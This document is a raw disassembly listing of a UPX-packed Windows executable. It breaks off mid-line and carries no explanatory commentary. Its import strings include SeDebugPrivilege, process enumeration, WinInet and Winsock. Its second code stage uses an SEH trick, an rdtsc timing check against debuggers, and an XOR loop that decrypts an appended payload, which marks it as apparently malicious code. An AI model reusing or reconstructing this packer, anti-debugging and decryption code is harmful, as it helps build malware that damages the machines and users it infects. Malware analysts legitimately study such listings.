7B7B2274h, 90130B1h, 3500398Ch dd 7301B223h, 72E1D5Bh, 0C9ABDA00h, 8273C80h, 0EC57DA20h dd 9F324E24h, 461A0003h, 6407923h, 4007471Bh, 45060006h dd 101B9FFFh, 8A151F01h, 48E088h, 444004Fh, 292FFFF6h dd 0F27A6A19h, 281C49E4h, 742530AFh, 0E1536710h, 4DF214F2h dd 3075DF5Ch, 0BAF70400h, 75CDAE6h, 5C085ABDh, 0D8DD4D61h dd 72E5DC8h, 2E380036h, 491B3077h, 0B62E6CECh, 1043EC00h dd 0E5633F00h, 6439E403h dd 4DC08A2h, 0B7FC83D8h, 0FF1640h, 0E00DEDEh, 19F1600h dd 26FD2602h, 2840484Ch, 6110319h, 8BF70D1Bh, 0D374D96Ch dd 90A5C370h, 9C2AB2EFh, 6077256Bh, 109FB6CFh, 1B04480Eh dd 0B73E1354h, 5A545D75h, 22596326h, 45CBC75Ch, 0E7FCD20Fh dd 58765h, 4810030Bh, 0FFB810B8h, 0E7B17FFh, 286A050Bh dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 0FF85F62Eh, 5D5FF5B1h dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 0B9F2D160h, 0F40C5EC8h dd 0CA060A3h, 5790F200h, 0CB10CA0h, 0C8E4EFFBh, 880CA000h dd 90040h, 0EC0703ECh, 0E49E11h, 4F401495h, 0BF40707Ch dd 1B2297B2h, 13430700h, 23FF09E7h, 138578h, 0E9A65BABh dd 63F81013h, 2F90273Ch, 230EFEFFh, 60C30740h, 8408E651h dd 0F74F9388h, 10B94349h, 0B801FFEEh, 0E4D98710h, 0AD200CC9h dd 7C7F070Dh, 0FC85796h, 700118D8h, 3E400F84h, 0F8495E4h dd 36000F95h, 21BF279h, 6C0F847Fh, 0AB7B000Fh, 0A89A1E12h dd 0FF13436Fh, 1F223024h, 50586E69h, 6C725020h, 2B029Bh dd 39014446h, 0F2113F24h, 123C6B32h, 0EC027515h, 41F21035h dd 941C0053h, 72BFFE01h, 0C606EB88h, 73255C5Ch, 6370695Ch dd 0FFE5D424h, 0EC81666Fh, 0E4FF071Ch, 44655300h, 67756265h dd 0E8DF7669h, 67ADD463h, 6A6441CFh, 6F548975h, 0DB92656Bh dd 176EB266h, 126F4C73h, 0FD1C7075h, 61567F76h, 4165756Ch dd 28704F17h, 2C77636Fh, 34C6A475h, 61766B00h, 0DF053367h dd 75E318D4h, 39316DCDh, 0FE6A322Dh, 9F5A3A37h, 72545F6Ch dd 6E577961h, 96DD4364h, 61AF36DAh, 6F94521Eh, 0AD685405h dd 0CCEA354h, 7C45614h, 0BA99B65Ch, 532841B5h, 3EA37845h dd 0FA34356Eh, 0F54BB3D2h, 544822F3h, 7D835054h, 404B46A9h dd 4F6C9C20h, 0BB0A0D4Bh, 1EF52B5h, 244CB4Bh, 0CA044C2Dh dd 676ADF66h, 25203A59h, 0DA2F1875h, 28587B5Ah, 26B97954h dd 6D5A70A7h, 63B2B6A6h, 2E2F15AFh, 8EA9EE56h, 72BF2DCBh dd 59B4CBCDh, 4757B18Bh, 1E3FC304h, 372A942Dh, 0F1640200h dd 0E95FED0Bh, 6D9573D7h, 0B1637673h, 2DDF77D7h, 25692D5Eh dd 175F320Fh, 98B73475h, 7BD2F6Bh, 38393103h, 0D34D34DBh dd 34353637h, 75236933h, 7DCE9A6h, 2F313203h, 0DEF60C39h dd 3837D9h, 37073B43h, 8320C832h, 0C8343536h, 330C8320h dd 93523132h, 0FB8B2CD4h, 0B7F9E03Ah, 0C7EDB58Ah, 54464F47h dd 45524157h, 9163F0Dh, 75435CD7h, 56297272h, 6C378442h dd 5C1E73E8h, 0B36E7552h, 0D0B6ED37h, 0EA6F74E2h, 20306838h dd 7FF81B53h, 0FB0F1A14h, 736E6753h, 796A7264h, 0CB564472h dd 7E741768h, 0B9AAEAA7h, 5F7A43C2h, 0CE23h, 4C10E147h dd 47136055h, 535E01BBh, 9E432053h, 0D5762067h, 0ADBD9B53h dd 945876DCh, 7C23B532h, 2D82F642h, 0E3471A1Bh, 23CB7337h dd 79931217h, 0A35A8473h, 4200F1B1h, 75D72077h, 0BDADB023h dd 6D1B13C5h, 0DD975220h, 0A5B73772h, 2044180Dh, 2F662620h dd 2D856D67h, 2AAC73D9h, 22632463h, 0FED722D9h, 20797469h dd 1E6E614Dh, 1831F81Ah, 420000Ch, 15455D12h, 0FB2493C4h dd 0C0017119h, 65657246h, 0B7E00D0Ch, 470DCD47h, 6F4D7465h dd 2F14BF87h, 434665C5h, 406D614Eh, 74736C01h, 35DEF772h dd 0A956380h, 79706F43h, 0E1480A19h, 456102DEh, 22326578h dd 0F8A5FFEDh, 6C6F6F54h, 3233703Bh, 70616E53h, 746F6873h dd 9B5BBA19h, 32127414h, 540F7372h, 235AE60Bh, 182C35A3h dd 0F60B6C21h, 78654E01h, 41616974h, 16BFFB54h, 0CF76453Ch dd 7469616Bh, 53726F46h, 0ED74423Ch, 4F7B676Dh, 2C766A62h dd 0E025A144h, 8D22B59Bh, 0CD964CB7h, 45DB76CDh, 2F725072h dd 48196972h, 0EF64BDD6h, 486573FDh, 0C646E61h, 886C3255h dd 8B61B59h, 4618E06Eh, 46D735F1h, 64B14465h, 59498B4Bh dd 530C1BC0h, 64656B1Dh, 0ADDD1F45h, 1270B36Dh, 661D4061h dd 1153246Fh, 96EC9B3h, 6EC17065h, 25CFF64Bh, 12EE9E9Bh dd 6464410Bh, 0EF660F72h, 4CD9221Bh, 61726269h, 0CD15B567h dd 4D2BC1B5h, 6C137C82h, 0BB961016h, 8763CF9Ch, 54F685B5h dd 75969869h, 2B4DDE65h, 0B15B092h, 0B4B44278h, 0D366C37h dd 0E539AF5Dh, 5D22CC21h, 78456862h, 66C25B6Dh, 630AF631h dd 373C6D13h, 522D8DC1h, 87B591Bh, 2ECD82ADh, 38657A94h dd 9F9D5B5Ch, 2CD1937Dh, 654B9367h, 0EC3B4579h, 7810CE40h dd 0A510F99h, 5AC25EC0h, 309011E8h, 426C5987h, 0D21021E7h dd 7B70A107h, 62410C51h, 6853B024h, 688D0E29h, 0FF78F1F6h dd 0D9851AC1h, 10892877h, 7DB662BBh, 6112440Ah, 6669320Eh dd 0B63AD61Bh, 8F67BC79h, 6C362B75h, 436F616Fh, 2C796FC0h dd 23506F11h, 52106770h, 3F900E8Fh, 0B4A438F6h, 71634114h dd 70726975h, 4DD874AEh, 3AA03549h, 59A7C336h, 73ECDE13h dd 6D06BC72h, 0D1CE18B1h, 840E27B2h, 99DA150Fh, 1D4D536Bh dd 0C54A445Fh, 3FB8740Ah, 0C5E8685Fh, 6EC46D27h, 0AD0702CDh dd 880D696Fh, 660AD172h, 14E955B3h, 40288901h, 0F3488CD3h dd 0CC652D15h, 0EC0CC362h, 0E10A1415h, 0DF26106Eh, 776C49ACh dd 0C20B7073h, 0B75BB669h, 0F44F4166h, 3DB6FC28h, 8B2C2834h dd 1141A155h, 16C05212h, 6A615F0Eh, 6B14C370h, 0C9416E09h dd 3BB86658h, 1A877453h, 0F5135B3Fh, 7940EB45h, 2C020273h dd 0D2CB2CBh, 346F3901h, 0B2CB2CB2h, 4090C17h, 2AA4F413h dd 141610CBh, 7C834550h, 74EC4AABh, 40E07ED2h, 0CE8011E0h dd 10F00FDh, 0BE06010Bh, 6ABA120Ch, 0EFCB20ECh, 31431024h dd 0BA4B020Bh, 7283259h, 364600Ch, 341E733Bh, 8060710h dd 37B39609h, 0E33F8C2Fh, 6405DB0Ah, 2E1E0180h, 0B06C0C5Bh dd 263207DDh, 0DBC42890h, 7D0483E3h, 642EE004h, 6E54FBE7h dd 1221DD21h, 162C27h, 0C08574BEh, 0C9314648h, 54h, 0 align 10h pusha mov esi, offset dword_31436000 lea edi, [esi-5000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31437CA2 ; --------------------------------------------------------------------------- align 8 loc_31437C98: ; CODE XREF: UPX1:loc_31437CA9j mov al, [esi] inc esi mov [edi], al inc edi loc_31437C9E: ; CODE XREF: UPX1:31437D36j ; UPX1:31437D4Dj add ebx, ebx jnz short loc_31437CA9 loc_31437CA2: ; CODE XREF: UPX1:31437C90j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CA9: ; CODE XREF: UPX1:31437CA0j jb short loc_31437C98 mov eax, 1 loc_31437CB0: ; CODE XREF: UPX1:31437CBFj ; UPX1:31437CCAj add ebx, ebx jnz short loc_31437CBB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CBB: ; CODE XREF: UPX1:31437CB2j adc eax, eax add ebx, ebx jnb short loc_31437CB0 jnz short loc_31437CCC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31437CB0 loc_31437CCC: ; CODE XREF: UPX1:31437CC1j xor ecx, ecx sub eax, 3 jb short loc_31437CE0 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_31437D52 mov ebp, eax loc_31437CE0: ; CODE XREF: UPX1:31437CD1j add ebx, ebx jnz short loc_31437CEB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CEB: ; CODE XREF: UPX1:31437CE2j adc ecx, ecx add ebx, ebx jnz short loc_31437CF8 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437CF8: ; CODE XREF: UPX1:31437CEFj adc ecx, ecx jnz short loc_31437D1C inc ecx loc_31437CFD: ; CODE XREF: UPX1:31437D0Cj ; UPX1:31437D17j add ebx, ebx jnz short loc_31437D08 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31437D08: ; CODE XREF: UPX1:31437CFFj adc ecx, ecx add ebx, ebx jnb short loc_31437CFD jnz short loc_31437D19 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31437CFD loc_31437D19: ; CODE XREF: UPX1:31437D0Ej add ecx, 2 loc_31437D1C: ; CODE XREF: UPX1:31437CFAj cmp ebp, 0FFFFF300h adc ecx, 1 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_31437D3C loc_31437D2D: ; CODE XREF: UPX1:31437D34j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_31437D2D jmp loc_31437C9E ; --------------------------------------------------------------------------- align 4 loc_31437D3C: ; CODE XREF: UPX1:31437D2Bj ; UPX1:31437D49j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_31437D3C add edi, ecx jmp loc_31437C9E ; --------------------------------------------------------------------------- loc_31437D52: ; CODE XREF: UPX1:31437CDCj pop esi mov edi, esi mov ecx, 86h loc_31437D5A: ; CODE XREF: UPX1:31437D61j ; UPX1:31437D66j mov al, [edi] inc edi sub al, 0E8h loc_31437D5F: ; CODE XREF: UPX1:31437D84j cmp al, 1 ja short loc_31437D5A cmp byte ptr [edi], 1 jnz short loc_31437D5A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov eax, ebx loop loc_31437D5F lea edi, [esi+5000h] loc_31437D8C: ; CODE XREF: UPX1:31437DAEj mov eax, [edi] or eax, eax jz short loc_31437DD7 mov ebx, [edi+4] lea eax, [eax+esi+7000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+708Ch] xchg eax, ebp loc_31437DA9: ; CODE XREF: UPX1:31437DCFj mov al, [edi] inc edi or al, al jz short loc_31437D8C mov ecx, edi jns short near ptr loc_31437DBA+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_31437DBA: ; CODE XREF: UPX1:31437DB2j mov ecx, 0AEF24857h push ebp call dword ptr [esi+7090h] or eax, eax jz short loc_31437DD1 mov [ebx], eax add ebx, 4 jmp short loc_31437DA9 ; --------------------------------------------------------------------------- loc_31437DD1: ; CODE XREF: UPX1:31437DC8j call dword ptr [esi+7094h] loc_31437DD7: ; CODE XREF: UPX1:31437D90j popa jmp loc_314324EF ; --------------------------------------------------------------------------- align 400h UPX1 ends ; Section 3. (virtual address 00008000) ; Virtual size : 00022000 ( 139264.) ; Section size in file : 00022000 ( 139264.) ; Offset to raw data for section: 00008000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31438000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 80C4h, 808Ch, 3 dup(0) dd 80D1h, 809Ch, 3 dup(0) dd 80DEh, 80A4h, 3 dup(0) dd 80E9h, 80ACh, 3 dup(0) dd 80F4h, 80B4h, 3 dup(0) dd 8100h, 80BCh, 5 dup(0) dword_3143808C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; UPX2:31442048r ... dd 7C80ADA0h, 7C81CDDAh, 0 dd 77DD6BF0h, 0 dd 77C371D3h, 0 dd 7E41A8ADh, 0 dd 42C2C8A1h, 0 dd 71AB9639h, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h dd 7C800000h, 0 dd 1E003143h, 300000h, 75Ch dup(0) ; --------------------------------------------------------------------------- call loc_3143A00F call sub_3143A090 jmp near ptr byte_3143A03C ; --------------------------------------------------------------------------- loc_3143A00F: ; CODE XREF: UPX2:3143A000p push dword ptr fs:0 mov ds:dword_3143A03D, esp mov fs:0, esp xor ecx, ecx push ecx push ecx push ecx push 1 push ecx push ecx push ecx push ecx push ecx push ecx push 10h call ds:dword_3143808C ; LoadLibraryA ; --------------------------------------------------------------------------- byte_3143A03C db 0BCh ; CODE XREF: UPX2:3143A00Aj dword_3143A03D dd 12FFBCh ; --------------------------------------------------------------------------- pop large dword ptr fs:0 pop esi cld sub eax, eax loc_3143A04C: ; CODE XREF: UPX2:3143A052j dec al or al, al jz short loc_3143A056 jnz short loc_3143A04C jmp short loc_3143A0BD ; --------------------------------------------------------------------------- loc_3143A056: ; CODE XREF: UPX2:3143A050j call sub_3143A08C add ebp, 42h mov ebx, 28B0h stc cld cld cld mov esi, 88h push ebp loc_3143A070: ; CODE XREF: UPX2:3143A086j mov al, [ebp+0] sub ax, si cld cld cld cld cld mov [ebp+0], al add ebp, 1 inc esi dec ebx cmp ebx, 0 jnz short loc_3143A070 pop ebp jmp ebp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_3143A08C proc near ; CODE XREF: UPX2:loc_3143A056p pop ebp jmp ebp sub_3143A08C endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_3143A090 proc near ; CODE XREF: UPX2:3143A005p arg_C = dword ptr 10h mov eax, [esp+arg_C] pop dword ptr [eax+0B8h] xor eax, eax retn sub_3143A090 endp ; sp-analysis failed ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3143A0E8 pop ecx loc_3143A0BD: ; CODE XREF: UPX2:3143A054j mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3143A0DF add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3143A0E7 ; --------------------------------------------------------------------------- loc_3143A0DF: ; CODE XREF: UPX2:3143A0D0j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3143A0E7: ; CODE XREF: UPX2:3143A0DDj pop ebx loc_3143A0E8: ; CODE XREF: UPX2:3143A0BAj push ebp mov ebp, eax sub dword ptr [esp+4], 1EA2h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_3143A15D mov ecx, eax call sub_3143A15D sub eax, ecx jz short loc_3143A131 cmp eax, 100h ja short loc_3143A131 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_3143A161 jmp short loc_3143A170 ; --------------------------------------------------------------------------- loc_3143A131: ; CODE XREF: UPX2:3143A118j ; UPX2:3143A11Fj test dword ptr [ebp+3638A5h], 80000000h jz short loc_3143A15B lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] ; CODE XREF: UPX2:3143A17Cj mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3143A15B: ; CODE XREF: UPX2:3143A13Bj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3143A15D proc near ; CODE XREF: UPX2:3143A10Ap ; UPX2:3143A111p rdtsc retn sub_3143A15D endp ; --------------------------------------------------------------------------- sahf ; =============== S U B R O U T I N E ======================================= sub_3143A161 proc near ; CODE XREF: UPX2:3143A12Ap mov dh, dl mov ecx, 27D2h loc_3143A168: ; CODE XREF: sub_3143A161+Cj xor [eax], dl inc eax add dl, dh loop loc_3143A168 retn sub_3143A161 endp ; --------------------------------------------------------------------------- loc_3143A170: ; CODE XREF: UPX2:3143A12Fj pop ds fstp9 st(2) mov cl, ch dec ebx ror dword ptr [ebx+1A278C0h], cl jnz short near ptr loc_3143A149+5 dec edx popa xchg eax, ebp sbb al, 0BBh pop eax mul cl fstp qword ptr [ebx-53h] psubsw mm6, qword ptr [eax+eax*4+5] sbb dl, [eax-4C8976E5h] xchg cl, [ecx+edx] arpl bp, ax sahf stosb mov ds:53017C8Ch, eax outsd jno short near ptr loc_3143A218+4 fcmovnbe st, st aad 8Ah xchg eax, edx pop edx pushf pop ds add [edi], esp cmp al, 0E7h loc_3143A1AF: ; CODE XREF: UPX2:3143A1B0j out dx, eax jge short loc_3143A1AF db 3Eh mov word ptr [ebx+532938D6h], ss outsd arpl sp, sp mov ds:0A744B0AFh, al lahf leave xlat loc_3143A1C4: ; CODE XREF: UPX2:3143A237j rcl dword ptr [eax], 0FCh fist dword ptr [eax+edx*4+30ED3329h] and eax, 16942D43h mov eax, 5CD1F456h ; CODE XREF: UPX2:3143A1E9j mov eax, ds:27E06F1Fh mov ah, dh dec esp fistp dword ptr [ecx+ebp*4+67h] loopne loc_3143A243 not dword ptr [esi-6Bh] jp short near ptr loc_3143A1D3+2 pusha loc_3143A1EC: ; CODE XREF: UPX2:3143A240j sub eax, esp bound eax, [eax] fisttp qword ptr [esi-41h] sbb [edx-2Fh], esp pop ss xchg ch, bl inc edx mov esi, 0BDF70629h ; CODE XREF: UPX2:3143A255j neg dword ptr ss:[ecx-6B3F9C10h] fcmovu st, st(5) outsb or al, 0AAh jnb near ptr 5EE51101h mov bh, bl dec edx movsb sbb esp, [eax-50h] loc_3143A218: ; CODE XREF: UPX2:3143A1A1j sbb eax, 43A15C13h sub bh, [ecx] xchg eax, esi db 3Eh xor al, 0B9h sbb esi, [esi+21507754h] dec eax imul esi, edi, 7FB2BB59h mov esi, edx popa into xchg eax, esi mov cl, 12h jg short loc_3143A1C4 sub eax, 0A486E849h jg short loc_3143A28C jmp short loc_3143A1EC ; --------------------------------------------------------------------------- db 3Ah ; --------------------------------------------------------------------------- loc_3143A243: ; CODE XREF: UPX2:3143A1E4j fld dword ptr [ebx] add [ebp-1Bh], cl push es mov bl, 1Ch enter 0FFFF8998h, 8Eh push ebp call near ptr 38137D1h loope near ptr loc_3143A1FA+1 xor ds:0C20D896Bh, ah icebp mov ah, 20h mov esi, 23EC5FDFh loop near ptr loc_3143A2D8+1 adc ds:109D92E9h, ch les esp, [edx-7Dh] ; CODE XREF: UPX2:3143A2B0j cmp eax, [eax-31h] dec esi push ss mov ah, 5 db 36h or edi, ebp fcomp dword ptr [esi+6] movsd retf ; --------------------------------------------------------------------------- db 55h dd 588C272Ch, 0C5C2217Bh, 81990C58h ; --------------------------------------------------------------------------- loc_3143A28C: ; CODE XREF: UPX2:3143A23Ej imul edi, [ecx], 7Ch sti push 3E182BFCh clc adc [eax-428A4CB2h], esi pop eax pop edi xor al, 0A0h push dword ptr ds:0F2803217h nop db 2Eh inc edi sub eax, 0E104CC1Ch inc ebx jbe short near ptr loc_3143A26D+1 dec edx clc sahf mov ebp, 9A352657h dec edx or byte ptr [edi-6B9F3DACh], 9Ch lds ecx, [ebp-60h] das test [eax+6Bh], dl dec esp and eax, 0A206884Ch inc eax dec ecx icebp scasd mov eax, 0BB92C246h loc_3143A2D8: ; CODE XREF: UPX2:3143A265j and ebp, edx or [esi+eax*2-4132FC1Ch], esp dec esp int 3 ; Trap to Debugger cwde mov ebx, 98022341h dec esp sbb ds:0ECE126D9h, ebp mov esi, 1E1226B7h xchg edx, [edx-0C46FC57h] jnb short loc_3143A32D movsb mov cl, 4Bh cmc loopne near ptr word_3143A336 ; --------------------------------------------------------------------------- db 0Fh dd 0CC756AE6h, 48A96439h, 55DD84E7h, 38ACC708h, 3532B055h dd 0B70EE38Eh, 370264C4h, 1910DC54h, 90F654DEh, 86AA4AEh ; --------------------------------------------------------------------------- cmpsd loc_3143A32D: ; CODE XREF: UPX2:3143A2FBj inc esp sbb eax, 6C874815h clc adc esi, esp ; --------------------------------------------------------------------------- word_3143A336 dw 0F4DDh ; CODE XREF: UPX2:3143A301j dd 0E84AAE8Ch, 89224ECh, 0D83E9CFEh, 0B873141Ch, 0C940DBE2h dd 40A36C36h, 2DE57CDFh, 30A4CF00h, 0A90A66A6h, 76171B46h dd 70FA6A85h, 1072D433h, 88E81D47h, 5962AE26h, 72B0367Dh dd 0CB9821E9h, 99212CB8h, 96FF27C5h, 58BA2A45h, 0D20610F9h dd 4E420C6Eh, 8E2284E6h, 74D6B80Ah, 22878BD6h, 0A58ADA75h dd 9615AE73h, 95B3EF3Eh, 0A6C98A0Bh, 9B647D2Eh, 80E0304Eh dd 0EAE73F1Eh, 70D202AAh, 0EA4A2801h, 0E5492486h, 0D80CA71Ch dd 0DFB36489h, 0FE1D706Bh, 0BA278F66h, 471A4AE5h, 0B51DF526h dd 0A83C5487h, 1B6461CDh, 0E8055C88h, 40F75B37h, 3EA7A96h dd 36592EABh, 87C0DF9Eh, 75DDB567h, 68FC14D3h, 0DBB0298Dh dd 51591C48h, 5F33E509h, 7E9266EBh, 0C19A6CE6h, 8517FC5Eh dd 0B02448BEh, 28E023C5h, 0D0FDBD30h, 1B9B5F3Ah, 69F114DCh dd 626AA679h, 5757C9BEh, 415A8A0Bh, 70D2348Fh, 1607A883h dd 63DDB79h, 953E1155h, 50B21476h, 8FA72788h, 0A490AF62h dd 830EE953h, 563EF460h, 36C6E47h, 0C28026C5h, 0F22ED74Bh dd 607BBC36h, 44614CAEh, 0C4E9C44Ch, 78B23CF4h, 9A5AB416h dd 2987DCEh, 75BDF408h, 588C2790h, 90F617AEh, 48DA0506h dd 0AAF60FE6h, 5256775Eh, 0DA121E96h, 28E0BE4Ch, 0A0726DAEh dd 497AB63Eh, 6FA2ABDCh, 3E513ABBh, 5BB1BA6h, 0FFDEB3E1h dd 0FDD23497h, 0DE5AACBBh, 6CC19D86h, 37B19CFEh, 0BD33B185h dd 0C81C9CEEh, 549581EBh, 58E57CE8h, 10F8A006h, 3DF593A4h dd 20B4DFB8h, 0EDA59C3Bh, 113C3C02h, 99024CAEh, 5362C426h dd 1ABF78FBh, 8202D363h, 4A35AE7h, 0E027C363h, 5DF5F429h dd 65CD94F6h, 489C3302h, 0FBA01119h, 0C7CDFC68h, 86293243h dd 428A864Eh, 0D6979BC4h, 0A17AEA05h, 90F2559Eh, 818BE7B9h dd 0D7B660AAh, 0C3E029E1h, 86E134A0h, 0D41C098Dh, 34C224B0h dd 66AF63A9h, 0D5B2224Dh, 8E4CF82Eh, 32A6FAE5h, 9C6E8330h dd 5A929E5Eh, 1E9F93E4h, 0A582D27Dh, 0B26287Eh, 107753DEh dd 19237FAEh, 855BFEC5h, 78EC00C8h, 8CD38663h, 1BA908AAh dd 0C836D774h, 5627DDFFh, 846294F6h, 18FB5A3Eh, 55DDD7B6h dd 38ACC730h, 0C44BB453h, 0CFE1341h, 0F687EBCEh, 0F07AEA02h dd 6F0DA973h, 4EFF337Dh, 6BE2729Dh, 0D09E3D90h, 27D23497h dd 0D30C39F1h, 0F53D24B0h, 0D80CA7B8h, 0AF497C9Fh, 0A2708C11h dd 2AA26E66h, 0D01A16DEh, 3096F457h, 0A860A845h, 0AB8E8E16h dd 0CE18A37Ah, 10468B4Eh, 60237FAEh, 0FF9D3BFCh, 6D9CA913h dd 0A100B420h, 0FD357CDFh, 0E0749F4Ch, 9B9AD8FDh, 886ACC66h dd 489A056Eh, 0C02CECE6h, 389AFD5Eh, 0B01274D6h, 288AEC4Eh dd 0A02AC1C6h, 187ADC3Eh, 0C3A405B6h, 333859D1h, 0D9494490h dd 8D9A38B2h, 0B33CD66Dh, 0F13B3983h, 9F9024B0h, 0EE01366Bh dd 3C379D76h, 202ABAD1h, 40A20470h, 0D3751392h, 42C28423h dd 0C4631AA7h, 76E78323h, 0FD8F30DFh, 0EF22D477h, 0BED11E3Bh dd 70E74D26h, 0BBDA0AA1h, 8333F64Ah, 5AB62EBh, 820DC063h dd 2CD97914h, 0A464C885h, 3CC9693Dh, 0B451E8E6h, 56FF902Ch dd 0D56037D6h, 6EEF982Fh, 0E16708AFh, 7D089F3Eh, 0D69720D7h dd 450FA047h, 0E99234C7h, 0F81BDB70h, 11B746D5h, 9A1AC97Ah dd 13A747E9h, 9B3ADD8Dh, 24D37104h, 0A54FDE8Bh, 14C77009h dd 0D97F0EB6h, 42D1F432h, 0CD7E0DABh, 45F08C12h, 0DBFA38DFh dd 6413B144h, 0E78518CBh, 6C07AC4Ah, 2BE80FEEh, 8322D578h dd 68BE43E6h, 942BDC43h, 3DC8742Ah, 9632F097h, 1CCF6007h dd 9447E98Fh, 4BE3AF31h, 0E47F11A2h, 28EF8127h, 0C5671680h dd 6A18B572h, 908B26D7h, 4E1EA969h, 0C18728CFh, 9128C86Ah dd 15A641F4h, 0AF4AED7Dh, 98450E3h, 0B169F992h, 17B2710Ch dd 0A16CF88Bh, 29F6610Ah, 0FF1A19B3h, 5FDF8033h, 0CD6619AAh dd 44EC850Eh, 98BB39D2h, 4406B171h, 0CE9A21CBh, 4E07A84Fh dd 39BF51FFh, 8437F316h, 18A749DAh, 8836C556h, 3DFD1C3Fh dd 0A257C282h, 26C5651Dh, 0B447C3E6h, 4BE89908h, 0F57C1BBFh dd 6F8AAD36h, 0CF5410A3h, 7D17A952h, 0FF943AFFh, 7C0BA15Ch dd 0C18C2BCFh, 9935F01Eh, 12BB78F2h, 9138CD7Ch, 18F24C7h dd 0BD53CA8Eh, 16D45B01h, 0C84FE087h, 2EC77429h, 0DD761598h dd 40E2951Bh, 0E96D02A7h, 45F2AB46h, 0F7880CD0h, 6301B155h dd 0E7981CAEh, 7311A145h, 119C0EADh, 0F026C764h, 0BA55EDEh dd 0D331D763h, 20DF524Ch, 0B5619482h, 24C34A1Ah, 0B456C583h dd 4DF8952Ch, 0F16111A2h, 5CEFBF4Eh, 0C56E0D80h, 7D17B56Ah dd 0F59E07B6h, 5B6ABC4Bh, 0E59637DFh, 9533E873h, 36BD60F3h dd 0BC2FC067h, 60A749EFh, 0B957F2ABh, 35DB4206h, 8E4CC399h dd 40C7680Fh, 0CC681588h, 71FE9523h, 0CB6500A2h, 49F0B346h dd 0F1BC39CAh, 5E72B15Ah, 0E28E0DDAh, 5016B753h, 11AC55ECh dd 9535D17Ah, 3A578FDh, 0AE42CA63h, 3DC85F0Ah, 9657E097h dd 48CF6007h, 0B261F0A8h, 5DEE9D3Bh, 0D37D0686h, 28F99F2Bh dd 0D2411088h, 7D0EBD5Bh, 0F39D26E6h, 4D19BF4Bh, 0F4AC44DEh dd 993FCE5Dh, 158151E2h, 8723D86Dh, 148C24E8h, 0B95FEEBDh dd 23E77102h, 0BA7AFE8Bh, 33C76709h, 0CC547CADh, 66E2951Bh dd 0E77D09A7h, 43E7B720h, 0F69535CAh, 5F069A36h, 0CE8429DEh dd 7A84Fh, 89548D0h, 8202DA73h, 1BAF4FE1h, 8B2DF075h, 16BA721Bh dd 0B542DB82h, 2BCF5F00h, 0AE4DED92h, 68EEB25Eh, 0D5661BA4h dd 41DC982Dh, 0C17710B4h, 751F9152h, 908B26D9h, 7D3BB860h dd 0C99B36C3h, 8A35DA70h, 19A655FBh, 871EC261h, 60AC41EDh dd 0AA6DE8B0h, 6D7601Fh, 0BD5EFE87h, 25EF6807h, 0C16813B3h dd 5CE6A656h, 0CB63029Bh, 73E78029h, 0F6932ECAh, 511D8051h dd 0DB833FC0h, 6E0BB652h, 2B8D3CF9h, 9126E757h, 18BF58FCh dd 8F2EC706h, 37C9790Dh, 0A457FF95h, 26C56F6Eh, 0B441E188h dd 4CFF9B5Eh, 0C4611BBEh, 